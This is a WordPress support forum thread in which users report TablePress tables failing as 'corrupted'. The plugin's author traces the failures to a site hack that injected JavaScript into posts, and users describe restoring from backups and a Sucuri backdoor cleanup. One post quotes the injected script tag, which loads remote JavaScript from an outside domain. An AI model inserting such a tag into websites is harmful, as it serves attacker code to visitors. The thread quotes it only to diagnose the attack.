    Hello Tobias,

All of tables made with table press are down. I connot edit them either.

I already sent Tobias a personal message about this. I am posting on this thread so that it may help others in the same situation.

This is the message I get on the page: Attention: The internal data of table “16” is corrupted!
…and on the plugin page: Attention: Unfortunately, an error occurred.

The internal data of table “Brentwood Home Cedar Mattress” (ID 10) is corrupted. The following error was registered: Syntax error.

Because of this error, the table can not be edited at this time, to prevent possible further data loss. Please see the TablePress FAQ page for further instructions.

Any input would be greatly appreciated.

    All the best,

    Olivier

    Hi,

an update for everyone reading this thread: I checked this out directly and found that some external source (likely a hacker script) added HTML code (to inject a JavaScript file) into all posts and pages. As this corrupts the TablePress JSON format, the tables appear to be corrupted.

    Regards,
    Tobias

    Hi Tobias,

    Was this code injected: <script src=’https://cdn.examhome.net/cdn.js?ver=1.0.5&#8242; type=’text/javascript’></script>

I’ve been fighting the last few hours determining where that came from on my website.

Was that on your plugin end or something on my website? Thank you

    Update:

It appears it has not only infected my one website, but my entire server. Other websites, even without this plugin installed, has this code injected into it.

    Thanks

    Hi,

I just replied to your email. As you have already found, this is not an issue in TablePress, but a more global hacking issue :-/

I hope the TablePress Debug Extension in my email helps a bit, but your best chance is to restore from a clean backup.

    Regards,
    Tobias

    Hello Everyone,

thank you again to Tobias for pointing out that my website had been hacked. I have resolved the issue by restoring the site from a previous version.

However, I must admit that I had many theme, wordpress and plugin updates that were long overdue. I have done all the necessary updates and learned more about scanning my site with WordFence.

Another point is that my backups were set to weekly, and because of this, I lost some work. I have now changed this and I am currently looking for a cloud-based backup option.

    Hope it helps,

    All the best.

    Hi Everyone,

    Posting for future readers.

Tobias is correct it was NOT a TablePress issue. Regardless, he promptly responded to my email and helped point me in the right direction.

Great support from him! Thank You Tobias!

I have 8 websites in my hosting account and all 8 get infected. Rather than trying to remove them, I restored my entire account.

    Hi,

no problem, you are very welcome! ?? Good to hear that this helped!

If you happen to find how the hack of the site worked, please let me know!

    Best wishes,
    Tobias

Sucuri just finished cleaning my website. Here’s their response:

I’ve just finished working on your case and clean now.
    We’ve analyzed all your websites.

The following files were cleaned, hardened, or removed:

CLEARED: Found malware on file: wp-content/uploads/assignments/some.php. Details: php.backdoor.file_put_contents.001
CLEARED: Found malware on file: wp-content/uploads/assignments/some.php_1. Details: php.backdoor.file_put_contents.001

I believe that is the LearnDash LMS plugin’s folder. Not sure though!

    Hi,

    thanks for sharing this!

“wp-content/uploads/” is the general uploads folder, but “assignments” might indeed be a subfolder by that plugin, just from the name.

    Tobias

    Hello Tobias,

I was trying to find some contact on you, but unfortunately I couldn’t find any.

I am facing the same problem. Every new table i create from this moment with A href tag is Corrupted and it says it has got Syntax error. Even old tables that I just “UPDATE” but even though I did not change anything has writtend same error.

One programmer was doing some work on one of my sites on the same server. I am scared now that there is some virus or malware.

    Could you help me, please?

    Hi @lewyn,

thanks for your post, and sorry for the trouble.

This issue was caused by a bug in the recent WordPress 5.1.
I have spent Friday working and releasing a fix for TablePress.
Please see this forums thread for more information and a possible solution to fix your tables: https://www.ads-software.com/support/topic/wp-5-1-support/page/2/#post-11236697

    Oh, nice thanks!

    It’s working!

I was stuck by this like maybe 4 hours, but I don’t care now. I’m happy my site is not hacked as I was thinking it is.

    Thanks for solving this Tobias!

P.S.: In case you haven’t, please rate TablePress here in the plugin directory. Thanks!
